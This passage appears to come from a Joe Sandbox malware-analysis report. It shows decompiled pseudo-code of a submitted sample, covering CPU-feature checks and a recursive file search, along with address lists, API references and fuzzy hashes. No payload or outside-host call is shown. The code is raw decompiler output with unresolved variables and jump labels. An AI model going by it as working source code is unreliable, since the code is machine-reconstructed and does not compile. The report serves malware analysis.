                                                                                                                                                                                                                                                                            							asm("xgetbv");
                                                                                                                                                                                                                                                                            							_v20 = _t59;
                                                                                                                                                                                                                                                                            							_v16 = _t84;
                                                                                                                                                                                                                                                                            							if((_v20 & 0x00000006) == 6 && 0 == 0) {
                                                                                                                                                                                                                                                                            								_t62 =  *0x40db50; // 0x2f
                                                                                                                                                                                                                                                                            								_t63 = _t62 | 0x00000008;
                                                                                                                                                                                                                                                                            								 *0x40e2bc = 3;
                                                                                                                                                                                                                                                                            								 *0x40db50 = _t63;
                                                                                                                                                                                                                                                                            								if((_v24 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                            									 *0x40e2bc = 5;
                                                                                                                                                                                                                                                                            									 *0x40db50 = _t63 | 0x00000020;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t68 = _v48 & 0x0fff3ff0;
                                                                                                                                                                                                                                                                            				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
                                                                                                                                                                                                                                                                            					_t94 =  *0x40e2c0; // 0x2
                                                                                                                                                                                                                                                                            					_t91 = _t94 | 0x00000001;
                                                                                                                                                                                                                                                                            					 *0x40e2c0 = _t91;
                                                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                                                                            0x0037e2de
                                                                                                                                                                                                                                                                            0x0037e2e1
                                                                                                                                                                                                                                                                            0x0037e2ef
                                                                                                                                                                                                                                                                            0x0037e2fe
                                                                                                                                                                                                                                                                            0x0037e47b
                                                                                                                                                                                                                                                                            0x0037e481
                                                                                                                                                                                                                                                                            0x0037e481
                                                                                                                                                                                                                                                                            0x0037e304
                                                                                                                                                                                                                                                                            0x0037e30a
                                                                                                                                                                                                                                                                            0x0037e315
                                                                                                                                                                                                                                                                            0x0037e31b
                                                                                                                                                                                                                                                                            0x0037e31e
                                                                                                                                                                                                                                                                            0x0037e31f
                                                                                                                                                                                                                                                                            0x0037e323
                                                                                                                                                                                                                                                                            0x0037e324
                                                                                                                                                                                                                                                                            0x0037e326
                                                                                                                                                                                                                                                                            0x0037e329
                                                                                                                                                                                                                                                                            0x0037e32e
                                                                                                                                                                                                                                                                            0x0037e337
                                                                                                                                                                                                                                                                            0x0037e348
                                                                                                                                                                                                                                                                            0x0037e353
                                                                                                                                                                                                                                                                            0x0037e359
                                                                                                                                                                                                                                                                            0x0037e35a
                                                                                                                                                                                                                                                                            0x0037e362
                                                                                                                                                                                                                                                                            0x0037e368
                                                                                                                                                                                                                                                                            0x0037e36a
                                                                                                                                                                                                                                                                            0x0037e36d
                                                                                                                                                                                                                                                                            0x0037e370
                                                                                                                                                                                                                                                                            0x0037e373
                                                                                                                                                                                                                                                                            0x0037e3b8
                                                                                                                                                                                                                                                                            0x0037e3b8
                                                                                                                                                                                                                                                                            0x0037e3be
                                                                                                                                                                                                                                                                            0x0037e3c5
                                                                                                                                                                                                                                                                            0x0037e3c8
                                                                                                                                                                                                                                                                            0x0037e3cb
                                                                                                                                                                                                                                                                            0x0037e3ce
                                                                                                                                                                                                                                                                            0x0037e3d1
                                                                                                                                                                                                                                                                            0x0037e3d5
                                                                                                                                                                                                                                                                            0x0037e3d8
                                                                                                                                                                                                                                                                            0x0037e3d9
                                                                                                                                                                                                                                                                            0x0037e3de
                                                                                                                                                                                                                                                                            0x0037e3e1
                                                                                                                                                                                                                                                                            0x0037e3e3
                                                                                                                                                                                                                                                                            0x0037e3e6
                                                                                                                                                                                                                                                                            0x0037e3e9
                                                                                                                                                                                                                                                                            0x0037e3ec
                                                                                                                                                                                                                                                                            0x0037e3f4
                                                                                                                                                                                                                                                                            0x0037e3f7
                                                                                                                                                                                                                                                                            0x0037e3fa
                                                                                                                                                                                                                                                                            0x0037e3ff
                                                                                                                                                                                                                                                                            0x0037e3ff
                                                                                                                                                                                                                                                                            0x0037e3fa
                                                                                                                                                                                                                                                                            0x0037e40c
                                                                                                                                                                                                                                                                            0x0037e40e
                                                                                                                                                                                                                                                                            0x0037e415
                                                                                                                                                                                                                                                                            0x0037e424
                                                                                                                                                                                                                                                                            0x0037e42f
                                                                                                                                                                                                                                                                            0x0037e432
                                                                                                                                                                                                                                                                            0x0037e435
                                                                                                                                                                                                                                                                            0x0037e446
                                                                                                                                                                                                                                                                            0x0037e44c
                                                                                                                                                                                                                                                                            0x0037e451
                                                                                                                                                                                                                                                                            0x0037e454
                                                                                                                                                                                                                                                                            0x0037e462
                                                                                                                                                                                                                                                                            0x0037e467
                                                                                                                                                                                                                                                                            0x0037e46c
                                                                                                                                                                                                                                                                            0x0037e476
                                                                                                                                                                                                                                                                            0x0037e476
                                                                                                                                                                                                                                                                            0x0037e467
                                                                                                                                                                                                                                                                            0x0037e446
                                                                                                                                                                                                                                                                            0x0037e424
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037e40c
                                                                                                                                                                                                                                                                            0x0037e378
                                                                                                                                                                                                                                                                            0x0037e382
                                                                                                                                                                                                                                                                            0x0037e3a7
                                                                                                                                                                                                                                                                            0x0037e3ad
                                                                                                                                                                                                                                                                            0x0037e3b0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0037E2F7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2325560087-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: c693d1442690f5bb1f324ac2b202ac6e9bc728f060ffbd10dc85213270be0846
                                                                                                                                                                                                                                                                            • Instruction ID: 564a21832d828ba0060ccd7b18cc5afd8ae327b8bc5f73f7203bf5762ea66b8e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c693d1442690f5bb1f324ac2b202ac6e9bc728f060ffbd10dc85213270be0846
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3511975D01209CBEB25CFAAD98569EBBF4FB48314F15C5AED409EB250D3389940CF90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                                                                            			E00381BA9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				WCHAR* _v36;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v556;
                                                                                                                                                                                                                                                                            				intOrPtr _v558;
                                                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAW _v604;
                                                                                                                                                                                                                                                                            				intOrPtr* _v608;
                                                                                                                                                                                                                                                                            				signed int _v612;
                                                                                                                                                                                                                                                                            				signed int _v616;
                                                                                                                                                                                                                                                                            				intOrPtr _v644;
                                                                                                                                                                                                                                                                            				intOrPtr _v648;
                                                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                                                            				signed char _t53;
                                                                                                                                                                                                                                                                            				signed int _t62;
                                                                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                                                                            				union _FINDEX_INFO_LEVELS _t66;
                                                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                                                            				signed int _t75;
                                                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                                                                            				signed int _t85;
                                                                                                                                                                                                                                                                            				void* _t89;
                                                                                                                                                                                                                                                                            				WCHAR* _t90;
                                                                                                                                                                                                                                                                            				intOrPtr* _t94;
                                                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                                                                                                                            				intOrPtr* _t104;
                                                                                                                                                                                                                                                                            				signed int _t107;
                                                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                                                                                            				void* _t112;
                                                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                                                            				signed int _t117;
                                                                                                                                                                                                                                                                            				void* _t118;
                                                                                                                                                                                                                                                                            				union _FINDEX_INFO_LEVELS _t119;
                                                                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                                                                            				signed int _t126;
                                                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                                                            				void* _t133;
                                                                                                                                                                                                                                                                            				signed int _t134;
                                                                                                                                                                                                                                                                            				void* _t135;
                                                                                                                                                                                                                                                                            				void* _t136;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                                                            				_t94 = _a4;
                                                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                                                            				_t2 = _t94 + 2; // 0x2
                                                                                                                                                                                                                                                                            				_t110 = _t2;
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					_t40 =  *_t94;
                                                                                                                                                                                                                                                                            					_t94 = _t94 + 2;
                                                                                                                                                                                                                                                                            				} while (_t40 != 0);
                                                                                                                                                                                                                                                                            				_t117 = _a12;
                                                                                                                                                                                                                                                                            				_t97 = (_t94 - _t110 >> 1) + 1;
                                                                                                                                                                                                                                                                            				_v8 = _t97;
                                                                                                                                                                                                                                                                            				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
                                                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                                                            					_t5 = _t117 + 1; // 0x1
                                                                                                                                                                                                                                                                            					_t89 = _t5 + _t97;
                                                                                                                                                                                                                                                                            					_t124 = E0037A89E(_t97, _t89, 2);
                                                                                                                                                                                                                                                                            					_pop(_t99);
                                                                                                                                                                                                                                                                            					__eflags = _t117;
                                                                                                                                                                                                                                                                            					if(_t117 == 0) {
                                                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                                                                            						_t89 = _t89 - _t117;
                                                                                                                                                                                                                                                                            						_t45 = E0037C0BB(_t99, _t124 + _t117 * 2, _t89, _a4);
                                                                                                                                                                                                                                                                            						_t134 = _t133 + 0x10;
                                                                                                                                                                                                                                                                            						__eflags = _t45;
                                                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t82 = E00381E22(_a16, __eflags, _t124);
                                                                                                                                                                                                                                                                            							E0037A8FB(0);
                                                                                                                                                                                                                                                                            							_t84 = _t82;
                                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_push(_t117);
                                                                                                                                                                                                                                                                            						_t85 = E0037C0BB(_t99, _t124, _t89, _a8);
                                                                                                                                                                                                                                                                            						_t134 = _t133 + 0x10;
                                                                                                                                                                                                                                                                            						__eflags = _t85;
                                                                                                                                                                                                                                                                            						if(_t85 != 0) {
                                                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                                            							E0037999A();
                                                                                                                                                                                                                                                                            							asm("int3");
                                                                                                                                                                                                                                                                            							_t132 = _t134;
                                                                                                                                                                                                                                                                            							_t135 = _t134 - 0x260;
                                                                                                                                                                                                                                                                            							_t48 =  *0x40db44; // 0x1f0d8c9c
                                                                                                                                                                                                                                                                            							_v48 = _t48 ^ _t132;
                                                                                                                                                                                                                                                                            							_t111 = _v28;
                                                                                                                                                                                                                                                                            							_t100 = _v32;
                                                                                                                                                                                                                                                                            							_push(_t89);
                                                                                                                                                                                                                                                                            							_t90 = _v36;
                                                                                                                                                                                                                                                                            							_push(_t124);
                                                                                                                                                                                                                                                                            							_push(_t117);
                                                                                                                                                                                                                                                                            							_t125 = 0x5c;
                                                                                                                                                                                                                                                                            							_v644 = _t111;
                                                                                                                                                                                                                                                                            							_v648 = 0x2f;
                                                                                                                                                                                                                                                                            							_t118 = 0x3a;
                                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                                            								__eflags = _t100 - _t90;
                                                                                                                                                                                                                                                                            								if(_t100 == _t90) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t50 =  *_t100 & 0x0000ffff;
                                                                                                                                                                                                                                                                            								__eflags = _t50 - _v612;
                                                                                                                                                                                                                                                                            								if(_t50 != _v612) {
                                                                                                                                                                                                                                                                            									__eflags = _t50 - _t125;
                                                                                                                                                                                                                                                                            									if(_t50 != _t125) {
                                                                                                                                                                                                                                                                            										__eflags = _t50 - _t118;
                                                                                                                                                                                                                                                                            										if(_t50 != _t118) {
                                                                                                                                                                                                                                                                            											_t100 = _t100 - 2;
                                                                                                                                                                                                                                                                            											__eflags = _t100;
                                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t126 =  *_t100 & 0x0000ffff;
                                                                                                                                                                                                                                                                            							__eflags = _t126 - _t118;
                                                                                                                                                                                                                                                                            							if(_t126 != _t118) {
                                                                                                                                                                                                                                                                            								L19:
                                                                                                                                                                                                                                                                            								_t51 = _t126;
                                                                                                                                                                                                                                                                            								_t119 = 0;
                                                                                                                                                                                                                                                                            								_t112 = 0x2f;
                                                                                                                                                                                                                                                                            								__eflags = _t51 - _t112;
                                                                                                                                                                                                                                                                            								if(_t51 == _t112) {
                                                                                                                                                                                                                                                                            									L23:
                                                                                                                                                                                                                                                                            									_t53 = 1;
                                                                                                                                                                                                                                                                            									__eflags = 1;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_t114 = 0x5c;
                                                                                                                                                                                                                                                                            									__eflags = _t51 - _t114;
                                                                                                                                                                                                                                                                            									if(_t51 == _t114) {
                                                                                                                                                                                                                                                                            										goto L23;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_t115 = 0x3a;
                                                                                                                                                                                                                                                                            										__eflags = _t51 - _t115;
                                                                                                                                                                                                                                                                            										if(_t51 == _t115) {
                                                                                                                                                                                                                                                                            											goto L23;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_t53 = 0;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t103 = (_t100 - _t90 >> 1) + 1;
                                                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
                                                                                                                                                                                                                                                                            								E0037F290(_t119,  &_v604, _t119, 0x250);
                                                                                                                                                                                                                                                                            								_t136 = _t135 + 0xc;
                                                                                                                                                                                                                                                                            								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
                                                                                                                                                                                                                                                                            								__eflags = _t127 - 0xffffffff;
                                                                                                                                                                                                                                                                            								if(_t127 != 0xffffffff) {
                                                                                                                                                                                                                                                                            									_t104 = _v608;
                                                                                                                                                                                                                                                                            									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
                                                                                                                                                                                                                                                                            									__eflags = _t62;
                                                                                                                                                                                                                                                                            									_v616 = _t62 >> 2;
                                                                                                                                                                                                                                                                            									_t64 = 0x2e;
                                                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                                                            										__eflags = _v604.cFileName - _t64;
                                                                                                                                                                                                                                                                            										if(_v604.cFileName != _t64) {
                                                                                                                                                                                                                                                                            											L36:
                                                                                                                                                                                                                                                                            											_push(_t104);
                                                                                                                                                                                                                                                                            											_t66 = E00381BA9(_t90, _t104, _t119, _t127,  &(_v604.cFileName), _t90, _v612);
                                                                                                                                                                                                                                                                            											_t136 = _t136 + 0x10;
                                                                                                                                                                                                                                                                            											__eflags = _t66;
                                                                                                                                                                                                                                                                            											if(_t66 != 0) {
                                                                                                                                                                                                                                                                            												goto L26;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												goto L37;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											__eflags = _v558 - _t119;
                                                                                                                                                                                                                                                                            											if(_v558 == _t119) {
                                                                                                                                                                                                                                                                            												goto L37;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												__eflags = _v558 - _t64;
                                                                                                                                                                                                                                                                            												if(_v558 != _t64) {
                                                                                                                                                                                                                                                                            													goto L36;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													__eflags = _v556 - _t119;
                                                                                                                                                                                                                                                                            													if(_v556 == _t119) {
                                                                                                                                                                                                                                                                            														goto L37;
                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                            														goto L36;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                                                                            										L37:
                                                                                                                                                                                                                                                                            										_t71 = FindNextFileW(_t127,  &_v604);
                                                                                                                                                                                                                                                                            										_t104 = _v608;
                                                                                                                                                                                                                                                                            										__eflags = _t71;
                                                                                                                                                                                                                                                                            										_t64 = 0x2e;
                                                                                                                                                                                                                                                                            									} while (_t71 != 0);
                                                                                                                                                                                                                                                                            									_t72 = _t104;
                                                                                                                                                                                                                                                                            									_t107 = _v616;
                                                                                                                                                                                                                                                                            									_t113 =  *_t72;
                                                                                                                                                                                                                                                                            									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
                                                                                                                                                                                                                                                                            									__eflags = _t107 - _t75;
                                                                                                                                                                                                                                                                            									if(_t107 != _t75) {
                                                                                                                                                                                                                                                                            										E00382C70(_t90, _t119, _t127, _t113 + _t107 * 4, _t75 - _t107, 4, E003819C4);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_push(_v608);
                                                                                                                                                                                                                                                                            									_t66 = E00381BA9(_t90, _t103, _t119, _t127, _t90, _t119, _t119);
                                                                                                                                                                                                                                                                            									L26:
                                                                                                                                                                                                                                                                            									_t119 = _t66;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags = _t127 - 0xffffffff;
                                                                                                                                                                                                                                                                            								if(_t127 != 0xffffffff) {
                                                                                                                                                                                                                                                                            									FindClose(_t127);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								__eflags = _t100 -  &(_t90[1]);
                                                                                                                                                                                                                                                                            								if(_t100 ==  &(_t90[1])) {
                                                                                                                                                                                                                                                                            									goto L19;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_push(_t111);
                                                                                                                                                                                                                                                                            									E00381BA9(_t90, _t100, 0, _t126, _t90, 0, 0);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__eflags = _v12 ^ _t132;
                                                                                                                                                                                                                                                                            							return E0037DE3E(_v12 ^ _t132);
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t84 = 0xc;
                                                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                                                            					return _t84;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L40:
                                                                                                                                                                                                                                                                            			}

























































                                                                                                                                                                                                                                                                            0x00381bae
                                                                                                                                                                                                                                                                            0x00381baf
                                                                                                                                                                                                                                                                            0x00381bb2
                                                                                                                                                                                                                                                                            0x00381bb3
                                                                                                                                                                                                                                                                            0x00381bb6
                                                                                                                                                                                                                                                                            0x00381bb6
                                                                                                                                                                                                                                                                            0x00381bb9
                                                                                                                                                                                                                                                                            0x00381bb9
                                                                                                                                                                                                                                                                            0x00381bbc
                                                                                                                                                                                                                                                                            0x00381bbf
                                                                                                                                                                                                                                                                            0x00381bc4
                                                                                                                                                                                                                                                                            0x00381bce
                                                                                                                                                                                                                                                                            0x00381bd1
                                                                                                                                                                                                                                                                            0x00381bd6
                                                                                                                                                                                                                                                                            0x00381bdd
                                                                                                                                                                                                                                                                            0x00381bde
                                                                                                                                                                                                                                                                            0x00381be1
                                                                                                                                                                                                                                                                            0x00381beb
                                                                                                                                                                                                                                                                            0x00381bee
                                                                                                                                                                                                                                                                            0x00381bef
                                                                                                                                                                                                                                                                            0x00381bf1
                                                                                                                                                                                                                                                                            0x00381c05
                                                                                                                                                                                                                                                                            0x00381c05
                                                                                                                                                                                                                                                                            0x00381c08
                                                                                                                                                                                                                                                                            0x00381c12
                                                                                                                                                                                                                                                                            0x00381c17
                                                                                                                                                                                                                                                                            0x00381c1a
                                                                                                                                                                                                                                                                            0x00381c1c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381c1e
                                                                                                                                                                                                                                                                            0x00381c22
                                                                                                                                                                                                                                                                            0x00381c2b
                                                                                                                                                                                                                                                                            0x00381c31
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381c33
                                                                                                                                                                                                                                                                            0x00381bf3
                                                                                                                                                                                                                                                                            0x00381bf3
                                                                                                                                                                                                                                                                            0x00381bf9
                                                                                                                                                                                                                                                                            0x00381bfe
                                                                                                                                                                                                                                                                            0x00381c01
                                                                                                                                                                                                                                                                            0x00381c03
                                                                                                                                                                                                                                                                            0x00381c3a
                                                                                                                                                                                                                                                                            0x00381c3c
                                                                                                                                                                                                                                                                            0x00381c3d
                                                                                                                                                                                                                                                                            0x00381c3e
                                                                                                                                                                                                                                                                            0x00381c3f
                                                                                                                                                                                                                                                                            0x00381c40
                                                                                                                                                                                                                                                                            0x00381c41
                                                                                                                                                                                                                                                                            0x00381c46
                                                                                                                                                                                                                                                                            0x00381c4a
                                                                                                                                                                                                                                                                            0x00381c4c
                                                                                                                                                                                                                                                                            0x00381c52
                                                                                                                                                                                                                                                                            0x00381c59
                                                                                                                                                                                                                                                                            0x00381c5c
                                                                                                                                                                                                                                                                            0x00381c5f
                                                                                                                                                                                                                                                                            0x00381c62
                                                                                                                                                                                                                                                                            0x00381c63
                                                                                                                                                                                                                                                                            0x00381c66
                                                                                                                                                                                                                                                                            0x00381c67
                                                                                                                                                                                                                                                                            0x00381c6a
                                                                                                                                                                                                                                                                            0x00381c6d
                                                                                                                                                                                                                                                                            0x00381c73
                                                                                                                                                                                                                                                                            0x00381c7d
                                                                                                                                                                                                                                                                            0x00381c99
                                                                                                                                                                                                                                                                            0x00381c99
                                                                                                                                                                                                                                                                            0x00381c9b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381c80
                                                                                                                                                                                                                                                                            0x00381c83
                                                                                                                                                                                                                                                                            0x00381c8a
                                                                                                                                                                                                                                                                            0x00381c8c
                                                                                                                                                                                                                                                                            0x00381c8f
                                                                                                                                                                                                                                                                            0x00381c91
                                                                                                                                                                                                                                                                            0x00381c94
                                                                                                                                                                                                                                                                            0x00381c96
                                                                                                                                                                                                                                                                            0x00381c96
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381c96
                                                                                                                                                                                                                                                                            0x00381c94
                                                                                                                                                                                                                                                                            0x00381c8f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381c8a
                                                                                                                                                                                                                                                                            0x00381c9d
                                                                                                                                                                                                                                                                            0x00381ca0
                                                                                                                                                                                                                                                                            0x00381ca3
                                                                                                                                                                                                                                                                            0x00381cbf
                                                                                                                                                                                                                                                                            0x00381cc1
                                                                                                                                                                                                                                                                            0x00381cc3
                                                                                                                                                                                                                                                                            0x00381cc5
                                                                                                                                                                                                                                                                            0x00381cc6
                                                                                                                                                                                                                                                                            0x00381cc9
                                                                                                                                                                                                                                                                            0x00381cdf
                                                                                                                                                                                                                                                                            0x00381ce1
                                                                                                                                                                                                                                                                            0x00381ce1
                                                                                                                                                                                                                                                                            0x00381ccb
                                                                                                                                                                                                                                                                            0x00381ccd
                                                                                                                                                                                                                                                                            0x00381cce
                                                                                                                                                                                                                                                                            0x00381cd1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381cd3
                                                                                                                                                                                                                                                                            0x00381cd5
                                                                                                                                                                                                                                                                            0x00381cd6
                                                                                                                                                                                                                                                                            0x00381cd9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381cdb
                                                                                                                                                                                                                                                                            0x00381cdb
                                                                                                                                                                                                                                                                            0x00381cdb
                                                                                                                                                                                                                                                                            0x00381cd9
                                                                                                                                                                                                                                                                            0x00381cd1
                                                                                                                                                                                                                                                                            0x00381ce9
                                                                                                                                                                                                                                                                            0x00381cf1
                                                                                                                                                                                                                                                                            0x00381cf5
                                                                                                                                                                                                                                                                            0x00381d03
                                                                                                                                                                                                                                                                            0x00381d08
                                                                                                                                                                                                                                                                            0x00381d1d
                                                                                                                                                                                                                                                                            0x00381d1f
                                                                                                                                                                                                                                                                            0x00381d22
                                                                                                                                                                                                                                                                            0x00381d57
                                                                                                                                                                                                                                                                            0x00381d62
                                                                                                                                                                                                                                                                            0x00381d62
                                                                                                                                                                                                                                                                            0x00381d67
                                                                                                                                                                                                                                                                            0x00381d6d
                                                                                                                                                                                                                                                                            0x00381d6e
                                                                                                                                                                                                                                                                            0x00381d6e
                                                                                                                                                                                                                                                                            0x00381d75
                                                                                                                                                                                                                                                                            0x00381d92
                                                                                                                                                                                                                                                                            0x00381d92
                                                                                                                                                                                                                                                                            0x00381da1
                                                                                                                                                                                                                                                                            0x00381da6
                                                                                                                                                                                                                                                                            0x00381da9
                                                                                                                                                                                                                                                                            0x00381dab
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381d77
                                                                                                                                                                                                                                                                            0x00381d77
                                                                                                                                                                                                                                                                            0x00381d7e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00381d80
                                                                                                                                                                                                                                                                            0x00381d80
                                                                                                                                                                                                                                                                            0x00381d87
